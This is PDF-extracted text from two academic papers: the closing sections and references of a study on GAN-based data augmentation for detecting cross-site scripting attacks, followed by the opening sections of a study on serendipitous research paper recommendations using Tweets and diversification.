Figure 6 The detector loss function over various generated data. Full-size DOI: 10.7717/peerjcs.328/fig-6 is trained to approximate the EM distance with an auxiliary of minority class for control mode to generate valid and reliable synthetic samples with identical distribution to real XSS attack scenarios. We trained a new boosting model using the augmented dataset to improve the XSS attack detection system and mitigate an unbalanced dataset problem. We conducted experiments to compare the proposed method with GAN, CGAN, WGAN, WGAN-GP, SMOTE, and ADASYN using two real-world XSS attack datasets. Experimental results show that the proposed method can train a generator model with improved training stability. The proposed method enhanced the detection of XSS attacks and prevented adversarial examples that have been widely used to target AI cyber defense systems. Furthermore, the Mokbal et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.328 16/20 https://peerj.com https://doi.org/10.7717/peerjcs.328/fig-5 https://doi.org/10.7717/peerjcs.328/fig-6 http://dx.doi.org/10.7717/peerj-cs.328 0.0 0.5 html_tag_script 0.2 0.0 0.2 js _s tr in g_ m ax _l en gt h A Class 1 Class 2 0.0 0.5 html_tag_script 0.2 0.0 0.2 B 0.0 0.5 html_tag_script 0.2 0.0 0.2 C 0.0 0.5 html_tag_script 0.2 0.0 0.2 D 0.0 0.5 html_tag_script 0.2 0.0 0.2 E 0.0 0.5 html_tag_script 0.2 0.0 0.2 F 0.0 0.5 html_tag_script 0.2 0.0 0.2 js _s tr in g_ m ax _l en gt h G 0.0 0.5 html_tag_script 0.2 0.0 0.2 H 0.0 0.5 html_tag_script 0.2 0.0 0.2 I 0.0 0.5 html_tag_script 0.2 0.0 0.2 J 0.0 0.5 html_tag_script 0.2 0.0 0.2 K 0.0 0.5 html_tag_script 0.2 0.0 0.2 L 0.0 0.5 html_tag_script 0.2 0.0 0.2 js _s tr in g_ m ax _l en gt h M 0.0 0.5 html_tag_script 0.2 0.0 0.2 N 0.0 0.5 html_tag_script 0.2 0.0 0.2 O 0.0 0.5 html_tag_script 0.2 0.0 0.2 P 0.0 0.5 html_tag_script 0.2 0.0 0.2 Q 0.0 0.5 html_tag_script 0.2 0.0 0.2 R 0.0 0.5 html_tag_script 0.2 0.0 0.2 js _s tr in g_ m ax _l en gt h S 0.0 0.5 html_tag_script 0.2 0.0 0.2 T 0.0 0.5 html_tag_script 0.2 0.0 0.2 U 0.0 0.5 html_tag_script 0.2 0.0 0.2 V 0.0 0.5 html_tag_script 0.2 0.0 0.2 W 0.0 0.5 html_tag_script 0.2 0.0 0.2 X 0.0 0.5 html_tag_script 0.2 0.0 0.2 js _s tr in g_ m ax _l en gt h Y 0.0 0.5 html_tag_script 0.2 0.0 0.2 Z 0.0 0.5 html_tag_script 0.2 0.0 0.2 AA 0.0 0.5 html_tag_script 0.2 0.0 0.2 BB 0.0 0.5 html_tag_script 0.2 0.0 0.2 CC 0.0 0.5 html_tag_script 0.2 0.0 0.2 DD 0.0 0.5 html_tag_script 0.2 0.0 0.2 js _s tr in g_ m ax _l en gt h EE 0.0 0.5 html_tag_script 0.2 0.0 0.2 FF 0.0 0.5 html_tag_script 0.2 0.0 0.2 GG 0.0 0.5 html_tag_script 0.2 0.0 0.2 HH 0.0 0.5 html_tag_script 0.2 0.0 0.2 II 0.0 0.5 html_tag_script 0.2 0.0 0.2 JJ 0.0 0.5 html_tag_script 0.2 0.0 0.2 js _s tr in g_ m ax _l en gt h KK 0.0 0.5 html_tag_script 0.2 0.0 0.2 LL 0.0 0.5 html_tag_script 0.2 0.0 0.2 MM 0.0 0.5 html_tag_script 0.2 0.0 0.2 NN 0.0 0.5 html_tag_script 0.2 0.0 0.2 OO 0.0 0.5 html_tag_script 0.2 0.0 0.2 PP training step 0 training step 100 training step 200 training step 500 training step 1000 training step 2000 training step 4000 Figure 7 (A-PP) General visualization of sample generation for C-WGAN-GP compared to other gen- erative methods. Full-size DOI: 10.7717/peerjcs.328/fig-7 C-WGAN-GP method can be extended to other forms of attacks and other fields, including the medical field, where datasets are highly unbalanced. For future work, we will investigate network training stability to generate data using various designs over different network architectures. It is a significant problem worthy of further research. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Fawaz Mahiuob Mohammed Mokbal conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, Mokbal et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.328 17/20 https://peerj.com https://doi.org/10.7717/peerjcs.328/fig-7 http://dx.doi.org/10.7717/peerj-cs.328 prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Dan Wang conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, supervising work, and approved the final draft. • Xiaoxi Wang analyzed the data, performed the computation work, prepared figures and/or tables, and approved the final draft. • Lihua Fu analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Data Deposition The following information was supplied regarding data availability: All raw data are available as Supplemental Files. Additional data are available at figshare: Mokbal, Fawaz (2020): Cross-Site Scripting Attack (XSS) dataset. figshare. Dataset. https://doi.org/10.6084/m9.figshare.13046138.v4. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.328#supplemental-information. REFERENCES Andreeva O, Gordeychik S, Gritsai G, Kochetova O, Potseluevskaya E, Sidorov SI, Timorin AA. 2016. Industrial control systems vulnerabilities statistics. Kaspersky Lab, Report DOI 10.13140/RG.2.2.15858.66241. Arjovsky M, Chintala S, Bottou L. 2017. Wasserstein generative adversarial networks. In: 34th international conference on machine learning, ICML 2017, vol. 1. 298–321. Borji A. 2019. Pros and cons of GAN evaluation measures. Computer Vision and Image Understanding 179:41–65 DOI 10.1016/j.cviu.2018.10.009. Buda M, Maki A, Mazurowski MA. 2018. A systematic study of the class imbalance problem in convolutional neural networks. Neural Networks 106:249–259 DOI 10.1016/j.neunet.2018.07.011. Bunkhumpornpat C, Sinapiromsaran K, Lursinsap C. 2012. DBSMOTE: density- based synthetic minority over-sampling technique. Applied Intelligence 36:664–684 DOI 10.1007/s10489-011-0287-y. Chen T, Guestrin C. 2016. XGBoost: a scalable tree boosting system. In: Proceedings of the 22nd ACM SIGKDD international conference on knowledge discovery and data mining - KDD ’16. New York: ACM Press, 785–794 DOI 10.1145/2939672.2939785. Deepa G, Thilagam PS. 2016. Securing web applications from injection and logic vulnerabilities: approaches and challenges. Information and Software Technology 74:160–180 DOI 10.1016/j.infsof.2016.02.005. Douzas G, Bacao F. 2018. Effective data generation for imbalanced learning using conditional generative adversarial networks. Expert Systems with Applications 91:464–471 DOI 10.1016/j.eswa.2017.09.030. Mokbal et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.328 18/20 https://peerj.com https://doi.org/10.6084/m9.figshare.13046138.v4 http://dx.doi.org/10.7717/peerj-cs.328#supplemental-information http://dx.doi.org/10.7717/peerj-cs.328#supplemental-information http://dx.doi.org/10.13140/RG.2.2.15858.66241 http://dx.doi.org/10.1016/j.cviu.2018.10.009 http://dx.doi.org/10.1016/j.neunet.2018.07.011 http://dx.doi.org/10.1007/s10489-011-0287-y http://dx.doi.org/10.1145/2939672.2939785 http://dx.doi.org/10.1016/j.infsof.2016.02.005 http://dx.doi.org/10.1016/j.eswa.2017.09.030 http://dx.doi.org/10.7717/peerj-cs.328 Elkan C. 2001. The foundations of cost-sensitive learning. In: IJCAI international joint conference on artificial intelligence. 973–978. Goodfellow IJ, Pouget-Abadie J, Mirza M, Xu B, Warde-Farley D, Ozair S, Courville A, Bengio Y. 2014. Generative adversarial nets. Advances in Neural Information Processing Systems 3:2672–2680. Gulrajani I, Ahmed F, Arjovsky M, Dumoulin V, Courville A. 2017. Improved training of wasserstein GANs. In: Advances in neural information processing systems 2017- December. 5768–5778. Haixiang G, Yijing L, Shang J, Mingyun G, Yuanyue H, Bing G. 2017. Learning from class-imbalanced data: review of methods and applications. Expert Systems with Applications 73:220–239 DOI 10.1016/j.eswa.2016.12.035. Han H, Wang WY, Mao BH. 2005. Borderline-SMOTE: a new over-sampling method in imbalanced data sets learning. In: International conference on intelligent computing. Berlin, Heidelberg: Springer, 878–887. He H, Bai Y, Garcia EA, Li S. 2008. ADASYN: adaptive synthetic sampling approach for imbalanced learning. In: Proceedings of the international joint conference on neural networks. 1322–1328 DOI 10.1109/IJCNN.2008.4633969. Kovács B, Tinya F, Németh C, Ódor P. 2002. SMOTE: synthetic minority over-sampling technique nitesh. Ecological Applications 30:321–357 DOI 10.1002/eap.2043. Lekies S, Kotowicz K, Grob S, Nava EAV, Johns M. 2017. Code-Reuse attacks for theweb: breaking cross-site scripting mitigations via script gadgets. In: Proceedings of the ACM conference on computer and communications security. New York: ACM Press, 1709–1723 DOI 10.1145/3133956.3134091. López V, Fernández A, García S, Palade V, Herrera F. 2013. An insight into classification with imbalanced data: empirical results and current trends on using data intrinsic characteristics. Information Sciences 250:113–141 DOI 10.1016/j.ins.2013.07.007. Lucic M, Kurach K, Michalski M, Bousquet O, Gelly S. 2018. Are Gans created equal? A large-scale study. In: Advances in Neural Information Processing Systems 2018- December. 700–709. Mirza M, Osindero S. 2014. Conditional generative adversarial nets. ArXiv preprint. arXiv:1411.1784. Mitropoulos D, Spinellis D. 2017. Fatal injection: a survey of modern code injection attack countermeasures. PeerJ Computer Science 3:e136 DOI 10.7717/peerj-cs.136. Mokbal FMM, Dan W, Imran A, Jiuchuan L, Akhtar F, Xiaoxi W. 2019. MLPXSS: an integrated XSS-based attack detection scheme in web applications using multilayer perceptron technique. IEEE Access 7:100567–100580 DOI 10.1109/access.2019.2927417. National Institute of Standards and Technology. 2020. National Vulnerability Database (NVD), Vulnerabilities. Available at https://nvd.nist.gov/vuln. Nunan AE, Souto E, dosSantos EM, Feitosa E. 2012. Automatic classification of cross- site scripting in web pages using document-based and URL-based features. In: 2012 IEEE symposium on computers and communications (ISCC). Piscataway: IEEE, 000702–000707 DOI 10.1109/ISCC.2012.6249380. Mokbal et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.328 19/20 https://peerj.com http://dx.doi.org/10.1016/j.eswa.2016.12.035 http://dx.doi.org/10.1109/IJCNN.2008.4633969 http://dx.doi.org/10.1002/eap.2043 http://dx.doi.org/10.1145/3133956.3134091 http://dx.doi.org/10.1016/j.ins.2013.07.007 http://arXiv.org/abs/1411.1784 http://dx.doi.org/10.7717/peerj-cs.136 http://dx.doi.org/10.1109/access.2019.2927417 https://nvd.nist.gov/vuln http://dx.doi.org/10.1109/ISCC.2012.6249380 http://dx.doi.org/10.7717/peerj-cs.328 Obimbo C, Ali K, Mohamed K. 2017. Using IDS to prevent XSS attacks. In: Int’ l Conf. security and management. 233–239. Pan Z, Yu W, Yi X, Khan A, Yuan F, Zheng Y. 2019. Recent progress on gener- ative adversarial networks (GANs): a survey. IEEE Access 7:36322–36333 DOI 10.1109/ACCESS.2019.2905015. Precise Security. 2020. Cross-Site Scripting (XSS) makes nearly 40% of all cyber attacks in 2019 - PreciseSecurity.com. Available at https://www.precisesecurity.com/articles/ cross-site-scripting-xss-makes-nearly-40-of-all-cyber-attacks-in-2019/ (accessed on 29 February 2020). Rathore S, Sharma PK, Park JH. 2017. XSSClassifier: an efficient XSS attack detection approach based on machine learning classifier on SNSs. Journal of Information Processing Systems 13:1014–1028 DOI 10.3745/JIPS.03.0079. Sarmah U, Bhattacharyya DK, Kalita JK. 2018. A survey of detection methods for XSS attacks. Journal of Network and Computer Applications 118:113–143 DOI 10.1016/j.jnca.2018.06.004. Sharafaldin I, HabibiLashkari A, Ghorbani AA. 2018. Toward generating a new intrusion detection dataset and intrusion traffic characterization. In: Proceedings of the 4th International Conference on Information Systems Security and Privacy - Volume 1: ICISSP. 108–116 DOI 10.5220/0006639801080116. Villani C. 2009. Optimal transport, old and new. Berlin: Springer Berlin Heidelberg DOI 10.1007/978-3-540-71050-9. Vluymans S. 2019. Learning from imbalanced data. Studies in Computational Intelligence 807:81–110 DOI 10.1007/978-3-030-04663-7_4. Wang Y, Cai W, Wei P. 2016. A deep learning approach for detecting malicious JavaScript code. Security and Communication Networks 9:1520–1534 DOI 10.1002/sec.1441. Wang R, Jia X, Li Q, Zhang S. 2014. Machine learning based cross-site scripting detection in online social network. In: Proceedings - 16th IEEE international conference on high performance computing and communications, HPCC 2014, 11th IEEE international conference on embedded software and systems, ICESS 2014 and 6th international symposium on cyberspace safety and security. Piscataway: IEEE, 823–826 DOI 10.1109/HPCC.2014.137. Wang R, Zhu Y, Tan J, Zhou B. 2017. Detection of malicious web pages based on hybrid analysis. Journal of Information Security and Applications 35:68–74 DOI 10.1016/j.jisa.2017.05.008. Zhou Y, Wang P. 2019. An ensemble learning approach for XSS attack detection with domain knowledge and threat intelligence. Computers and Security 82:261–269 DOI 10.1016/j.cose.2018.12.016. Mokbal et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.328 20/20 https://peerj.com http://dx.doi.org/10.1109/ACCESS.2019.2905015 https://www.precisesecurity.com/articles/cross-site-scripting-xss-makes-nearly-40-of-all-cyber-attacks-in-2019/ https://www.precisesecurity.com/articles/cross-site-scripting-xss-makes-nearly-40-of-all-cyber-attacks-in-2019/ http://dx.doi.org/10.3745/JIPS.03.0079 http://dx.doi.org/10.1016/j.jnca.2018.06.004 http://dx.doi.org/10.5220/0006639801080116 http://dx.doi.org/10.1007/978-3-540-71050-9 http://dx.doi.org/10.1007/978-3-030-04663-7_4 http://dx.doi.org/10.1002/sec.1441 http://dx.doi.org/10.1109/HPCC.2014.137 http://dx.doi.org/10.1016/j.jisa.2017.05.008 http://dx.doi.org/10.1016/j.cose.2018.12.016 http://dx.doi.org/10.7717/peerj-cs.328 work_skpo2nwcjjhrha4u7r42xpqgva ---- Influence of tweets and diversification on serendipitous research paper recommender systems Influence of tweets and diversification on serendipitous research paper recommender systems Chifumi Nishioka1,*, Jörn Hauke2,* and Ansgar Scherp3 1 Kyoto University, Kyoto, Japan 2 Christian-Albrechts-Universität Kiel, Kiel, Germany 3 University of Essex, Colchester, UK * These authors contributed equally to this work. ABSTRACT In recent years, a large body of literature has accumulated around the topic of research paper recommender systems. However, since most studies have focused on the variable of accuracy, they have overlooked the serendipity of recommendations, which is an important determinant of user satisfaction. Serendipity is concerned with the relevance and unexpectedness of recommendations, and so serendipitous items are considered those which positively surprise users. The purpose of this article was to examine two key research questions: firstly, whether a user’s Tweets can assist in generating more serendipitous recommendations; and secondly, whether the diversification of a list of recommended items further improves serendipity. To investigate these issues, an online experiment was conducted in the domain of computer science with 22 subjects. As an evaluation metric, we use the serendipity score (SRDP), in which the unexpectedness of recommendations is inferred by using a primitive recommendation strategy. The results indicate that a user’s Tweets do not improve serendipity, but they can reflect recent research interests and are typically heterogeneous. Contrastingly, diversification was found to lead to a greater number of serendipitous research paper recommendations. Subjects Data Mining and Machine Learning, Digital Libraries Keywords Recommender system, Experimental study, User study, Scholarly articles, Serendipity, Digital library INTRODUCTION To help researchers overcome the problem of information overload, various studies have developed recommender systems (Beel et al., 2016; Bai et al., 2019). Recommendations are generated based on considerations such as a user’s own papers (Sugiyama & Kan, 2010; Kaya, 2018) or the papers a user has accessed or liked in the past (Nascimento et al., 2011; Achakulvisut et al., 2016). Most previous studies have focused only on improving the accuracy of recommendations, one example of which is normalised discounted cumulative gain (nDCG). However, several studies on recommender systems conducted in other domains (e.g. movies) have drawn attention to the fact that there are important aspects other than accuracy (McNee, Riedl & Konstan, 2006; Herlocker et al., 2004; Kotkov, Wang & Veijalainen, 2016; Kotkov, Veijalainen & Wang, 2018). One of these aspects is serendipity, which is concerned with the unexpectedness of recommendations and the How to cite this article Nishioka C, Hauke J, Scherp A. 2020. Influence of tweets and diversification on serendipitous research paper recommender systems. PeerJ Comput. Sci. 6:e273 DOI 10.7717/peerj-cs.273 Submitted 20 August 2019 Accepted 13 April 2020 Published 18 May 2020 Corresponding author Chifumi Nishioka, nishioka.chifumi.2c@kyoto-u.ac.jp Academic editor Nick Higham Additional Information and Declarations can be found on page 17 DOI 10.7717/peerj-cs.273 Copyright 2020 Nishioka et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.273 mailto:nishioka.�chifumi.�2c@�kyoto-u.�ac.�jp https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.273 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ degree to which recommendations positively surprise users (Ge, Delgado-Battenfeld & Jannach, 2010). A survey by Uchiyama et al. (2011) revealed that researchers think that it is important for them to be recommended serendipitous research papers. In this article, we study a research paper recommender system focusing on serendipity. Sugiyama & Kan (2015) investigated serendipitous research paper recommendations, focusing on the influence of dissimilar users and the co-author network on recommendation performance. In contrast, this study investigates the following research questions: � (RQ1) Do a user’s Tweets generate serendipitous recommendations? � (RQ2) Is it possible to improve a recommendation list’s serendipity through diversification? We run an online experiment to facilitate an empirical investigation of these two research questions using three factors. For RQ1, we employ the factor User Profile Source, where we compare the two sources of user profiles: firstly, a user’s own papers; and secondly, a user’s Tweets. The user’s own papers are a feature of existing recommender systems, as evidenced by the work conducted by Sugiyama & Kan (2015) and Google Scholar (https://scholar.google.co.jp/). In this study, we assume that the user’s Tweets produce recommendations that cannot be generated based on papers, since researchers Tweet about recent developments and interests that are yet not reflected in their papers (e. g. what they found interesting at a conference or in their social network) (Letierce et al., 2010). In addition, they are likely to have used their Twitter accounts to express private interests. We conjecture that taking private interests into consideration delivers serendipitous recommendations, since the recommender system will then suggest research papers that include both professional interests and private interests, and which are thus likely to be serendipitous. We also observed that recommendations based on a user’s Tweets received a precision of 60%, which is fairly high in the domain of economics (Nishioka & Scherp, 2016). Furthermore, we analyse the factor Text Mining Method, which applies different methods of candidate items (i.e. research papers) for computing profiles, as well as user profiles comprising different content (i.e. Tweets or previous papers). As text mining methods, we compare TF-IDF (Salton & Buckley, 1988) with two of its recent extensions, namely CF-IDF (Goossen et al., 2011) and HCF-IDF (Nishioka, Große-Bölting & Scherp, 2015). Both have been associated with high levels of performance in recommendation tasks (Goossen et al., 2011; Nishioka, Große-Bölting & Scherp, 2015). We introduce this factor because text mining methods can have a substantial influence on generating recommendations. For RQ2, we introduce the factor Ranking Method, where we compare two ranking methods: firstly, classical cosine similarity; and secondly, the established diversification algorithm IA-Select (Agrawal et al., 2009). Cosine similarity has been widely used in recommender systems (Lops, De Gemmis & Semeraro, 2011), while IA-Select ranks candidate items with the objective of diversifying recommendations in a list. Since it broadens the coverage of topics in a list, we assume that IA-Select delivers more serendipitous recommendations compared to cosine similarity. Nishioka et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.273 2/20 https://scholar.google.co.jp/ http://dx.doi.org/10.7717/peerj-cs.273 https://peerj.com/computer-science/ Along with the three factors User Profile Source, Text Mining Method, and Ranking Method, we conduct an online experiment in which 22 subjects receive research paper recommendations in the field of computer science. As an evaluation metric, we use the serendipity score (SRDP), which takes unexpectedness and usefulness of recommendations into account. It considers a recommendation as unexpected, if it is not recommended by a primitive recommendation strategy (i.e. baseline). The results reveal that a user’s Tweets do not improve the serendipity of recommender systems. On the other hand, we confirm that the diversification of a recommendation list by IA-Select delivers more serendipitous recommendations to users. The remainder of the paper is organised as follows: firstly, we describe related studies; in turn, we describe the recommender system and the experimental factors and evaluation setup; and finally, before concluding the article, we report on and discuss the experimental results. RELATED WORK Over the last decade, many studies have developed research paper recommender systems (Beel et al., 2016; Bai et al., 2019). According to Beel et al. (2016), more than half of these studies (55%) have applied a content-based approach. Collaborative filtering was applied by 18% and graph-based recommendations, utilising citation networks or co-authorship networks, were applied by 16%. Other researches have employed stereotyping, item-centric recommendations, and hybrid recommendations. In this article, we employ a content-based approach, as a number of works have done in the past with promising results (Sugiyama & Kan, 2010; Nascimento et al., 2011; Achakulvisut et al., 2016; Kaya, 2018). Clarifying the notion of serendipity Most existing studies have evaluated research paper recommender systems by focusing on measures of accuracy, including precision, mean reciprocal rank (MRR), and normalised discounted cumulative gain (nDCG). However, studies that have addressed recommender systems in other domains (e.g. movies) argue that there are important considerations other than accuracy (McNee, Riedl & Konstan, 2006; Herlocker et al., 2004). One of these considerations is serendipity, which is a term that has been defined differently in the literature in the context of recommender systems. For instance, Kotkov, Wang & Veijalainen (2016) defined serendipity as “a property that indicates how good a recommender system is at suggesting serendipitous items that are relevant, novel and unexpected for a particular user.” Similarly, Herlocker et al. (2004) defined serendipity as measure of the extent to which the recommended items are both attractive and surprising to the users. Other researchers have offered comparable definitions of serendipity (Shani & Gunawardana, 2011). According to Ge, Delgado-Battenfeld & Jannach (2010), it is important to recognise two important aspects of serendipity: firstly, a serendipitous item should be unknown to the user and, moreover, should not be expected; and secondly, the item should be interesting, relevant, and useful to the user. Taking these two aspects into account, Nishioka et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.273 3/20 http://dx.doi.org/10.7717/peerj-cs.273 https://peerj.com/computer-science/ Ge, Delgado-Battenfeld & Jannach (2010) proposed a quantitative metric to evaluate the degree to which recommender systems are effective at generating serendipitous recommendations. Most recently, Kotkov et al. (2018) conducted a literature review and operationalised common definitions of serendipity. Regarding unexpectedness, they organised four different definitions: � Unexpectedness to be relevant (i.e. a user does not expect an item to be relevant). � Unexpectedness to be found (i.e. a user would not have found this item on their own). � Implicit unexpectedness (i.e. an item is significantly dissimilar to items a user usually consumes). � Unexpectedness to be recommended (i.e. a user does not expect an item to be recommended). In terms of novelty, they set two different definitions: � Strict novelty (i.e. a user has never heard about an item or has consumed it and forgot about it). � Motivationally novelty (i.e. a user has heard about an item, but has not consumed it). This resulted in 4 × 2 = 8 definitions of serendipity. In addition, they investigated effects of different definitions of serendipity on preference broadening and user satisfaction. They found that all variations of unexpectedness and novelty broaden user preferences, but one variation of unexpectedness (unexpected to be relevant) hurts user satisfaction. In this study, we evaluate the serendipity of recommendations using a metric proposed by Ge, Delgado-Battenfeld & Jannach (2010). The metric considers a recommendation as unexpected, if it is not recommended by a primitive recommendation strategy (i.e. baseline). Thus, this study takes into account “unexpectedness to be found” and “unexpectedness to be recommended” in the different variations of unexpectedness proposed by Kotkov et al. (2018). We choose this definition of serendipity as this is most relevant in our library context, where we recommend scientific papers to researchers (Vagliano et al., 2018). Use of social media for serendipitous recommendations In previous studies addressing content-based research paper recommender systems (Beel et al., 2016; Bai et al., 2019), the authors calculated recommendations based on a user’s own papers (Sugiyama & Kan, 2010) or papers a user has read in the past (Nascimento et al., 2011). In other domains, several studies have developed content-based recommender systems (Chen et al., 2010; Orlandi, Breslin & Passant, 2012; Shen et al., 2013) that utilise data from a user’s social media accounts, including Twitter and Facebook. Another study proposed research paper recommendations based on a user’s Tweets, which received a relatively high precision of 60% (Nishioka & Scherp, 2016). However, we hypothesise that because researchers Tweet about recent developments and interests that are not yet reflected in their papers (Letierce et al., 2010), a user’s Tweets will deliver recommendations that are not generated based on papers. Nishioka et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.273 4/20 http://dx.doi.org/10.7717/peerj-cs.273 https://peerj.com/computer-science/ In the context of research paper recommender systems, Sugiyama & Kan (2015) investigated serendipitous research paper recommendations focusing on the influence of dissimilar users and the co-author network on the recommendation performance. However, the researchers evaluated their approaches using accuracy-focused evaluation metrics such as nDCG and MRR. Uchiyama et al. (2011) considered serendipitous research papers as papers that are similar but in different fields from users’ field. In contrast, this article investigates serendipitous research paper recommendations from the perspective of Tweets and diversification. Use of diversification for serendipitous recommendations As discussed above, unexpectedness is a key concept for serendipity (Ge, Delgado- Battenfeld & Jannach, 2010). One approach that can be used to generate unexpected recommendations relates to diversification (Ziegler et al., 2005; Agrawal et al., 2009). This is because diversification leads to the creation of recommendation lists that include dissimilar items, meaning that users have an opportunity to encounter items they are unfamiliar with. IA-Select (Agrawal et al., 2009) has been used in the past as a solid baseline for diversifying lists of recommendations (Vargas & Castells, 2011; Vargas, Castells & Vallet, 2011; Wu et al., 2018). Additionally, Maximum Marginal Relevance (MMR) (Carbonell & Goldstein, 1998) is a well-known diversification method. Kotkov, Veijalainen & Wang (2018) proposed a serendipity-oriented greedy (SOG) algorithm, which diversifies a list of recommendations by considering unpopularity and dissimilarity. In this article, we employ IA-Select, because the experimental research conducted by Vargas & Castells (2011) shows that IA-Select performs better in general and the SOG algorithm requires a parameter setting. EXPERIMENTAL FACTORS In this article, we build a content-based recommender system along with the three factors User Profile Source, Text Mining Method, and Ranking Method. It works as follows: 1. Candidate items of the recommender system (i.e. research papers) are processed by one of the text mining methods, and paper profiles are generated. A candidate item and a set of candidate items are referred as d and D, respectively. d’s paper profile Pd is represented by a set of features F and their weights. Depending on text mining methods, a feature f is either a textual term or a concept. Formally, paper profiles are described as: Pd = {(f, w(f, d)) | ∀ f ∈ F }. The weighting function w returns a weight of a feature f for data source Iu. This weight identifies the importance of the feature f for the user u. 2. A user profile is generated based on the user profile source (i.e. Tweets or own papers) using the same text mining method, which is applied to generate paper profiles. Iu is a set of data items i of a user u. In this article, Iu is either a set of a user’s Tweets or a set of a user’s own papers. u’s user profile Pu is represented in a way that it is comparable to Pu as: Pu = {(f, w(f, Iu)) | ∀ f ∈ F }. 3. One of the ranking methods determines the order of recommended papers. Nishioka et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.273 5/20 http://dx.doi.org/10.7717/peerj-cs.273 https://peerj.com/computer-science/ The experimental design is illustrated in Table 1, where each cell is a possible design choice in each factor. In this section, we first provide a detailed account of the factor User Profile Source. In turn, we show three of the different text mining methods that were applied in the experiment. Finally, we note the details of the factor Ranking Method, which examines whether diversification improves the serendipity of recommendations. User profile source In this factor, we compare the following two data sources that are used to build a user profile. � Research papers: The research papers written by a user are used as a baseline. This approach is motivated by previous studies that have investigated research paper recommender systems, including Sugiyama & Kan (2010) and Google Scholar. � Twitter: In contrast to the user’s papers, we assume that using Tweets leads to more serendipitous recommendations. It is common practice among researchers to Tweet about their professional interests (Letierce et al., 2010). Therefore, Tweets can be used to build a user profile in the context of a research paper recommender system. We hypothesise that a user’s Tweets improve the serendipitous nature of recommendations because researchers are likely to Tweet about recent interests and information (e.g. from social networks) that are not yet reflected in their papers. Text mining method For each of the two data sources (i.e. the user’s own papers or their Tweets) and the candidate items, we apply a text mining method using one of three text mining methods. Specifically, we compare three methods, namely TF-IDF (Salton & Buckley, 1988), CF-IDF (Goossen et al., 2011), and HCF-IDF (Nishioka, Große-Bölting & Scherp, 2015), to build paper profiles and a user profile. This factor was introduced because the effectiveness of each text mining method is informed by the type of content that will be analysed (e.g. Tweets or research papers). For each method, a weighting function w is defined. This weighting function assigns a specific weight to each feature f, which is a term in TF-IDF and a semantic concept in CF-IDF and HCF-IDF. � TF-IDF: Since TF-IDF is frequently used in recommender systems as a baseline (Goossen et al., 2011), we also use it in this study. Terms are lemmatised and stop words are removed (http://www.nltk.org/book/ch02.html). In addition, terms with fewer than Table 1 Experimental factors and design choices. Factor Possible design choices User profile source Twitter Own papers Text mining method TF-IDF CF-IDF HCF-IDF Ranking method Cosine similarity IA-select Nishioka et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.273 6/20 http://www.nltk.org/book/ch02.html http://dx.doi.org/10.7717/peerj-cs.273 https://peerj.com/computer-science/ three characters are filtered out due to ambiguity. After pre-processing texts, TF-IDF is computed as: wtf ‐idfðw; tÞ ¼ tf ðw; tÞ � log jDj jfw 2 d : d 2 Djg (1) tf returns the frequency of a term w in a text t. A text t is either a user profile source Iu or candidate item d. The term frequency acts under the assumption that more frequent terms are more important (Salton & Buckley, 1988). The second term of the equation presents the inverse document frequency, which measures the relative importance of a term w in a corpus D (i.e. a set of candidate items). � CF-IDF: Concept frequency inverse document frequency (CF-IDF) (Goossen et al., 2011) is an extension of TF-IDF, which replaces terms with semantic concepts from a knowledge base. The use of a knowledge base decreases noise in profiles (Abel, Herder & Krause, 2011; Middleton, Shadbolt & De Roure, 2004). In addition, since a knowledge base can store multiple labels for a concept, the method directly supports synonyms. For example, the concept “recommender systems” of the ACM Computing Classification Systems (ACM CCS) has multiple labels, including “recommendation systems”, “recommendation engine”, and “recommendation platforms”. The weighting function w for CF-IDF is defined as: wcf ‐idfða; tÞ ¼ cf ða; tÞ � log jDj jfa 2 d : d 2 Djg (2) cf returns the frequency of a semantic concept a in a text t. The second term presents the IDF, which measures the relative importance of a semantic concept a in a corpus D. � HCF-IDF: Finally, we apply hierarchical concept frequency inverse document frequency (HCF-IDF) (Nishioka, Große-Bölting & Scherp, 2015), which is an extension of CF-IDF. HCF-IDF applies a propagation function (Kapanipathi et al., 2014) over a hierarchical structure of a knowledge base to assign a weight to concepts at higher levels. In this way, it identifies concepts that are not mentioned in a text but which are highly relevant. HCF-IDF calculates the weight of a semantic concept a in a text t as follows: whcf ‐idfða; tÞ ¼ BLða; tÞ � log jDj jfd 2 D : a 2 dgj (3) BL(a, t) is the BellLog propagation function (Kapanipathi et al., 2014), which is defined as: BLða; tÞ ¼ cf ða; tÞ þ FLðaÞ � X aj2pcðaÞ BLðaj; tÞ (4) where cf(a, t) is a frequency of a concept a in a text t, and FLðaÞ ¼ 1 log10ðnodesðhðaÞ þ 1ÞÞ . The propagation function underlies the assumption that, in human memory, information is represented through associations or semantic Nishioka et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.273 7/20 http://dx.doi.org/10.7717/peerj-cs.273 https://peerj.com/computer-science/ networks (Collins & Loftus, 1975). The function h(a) returns the level, where a concept a is located in the knowledge base. Additionally, nodes provides the number of concepts at a given level in a knowledge base, and pc(a) returns all parent concepts of a concept a. In this study, we employ HCF-IDF since it has been shown to work effectively for short pieces of text, including Tweets (Nishioka & Scherp, 2016), in the domain of economics. Ranking method Finally, we rank all the candidate items to determine which items should be recommended to a user. In this factor, we compare two ranking methods: cosine similarity and diversification with IA-Select (Agrawal et al., 2009). � 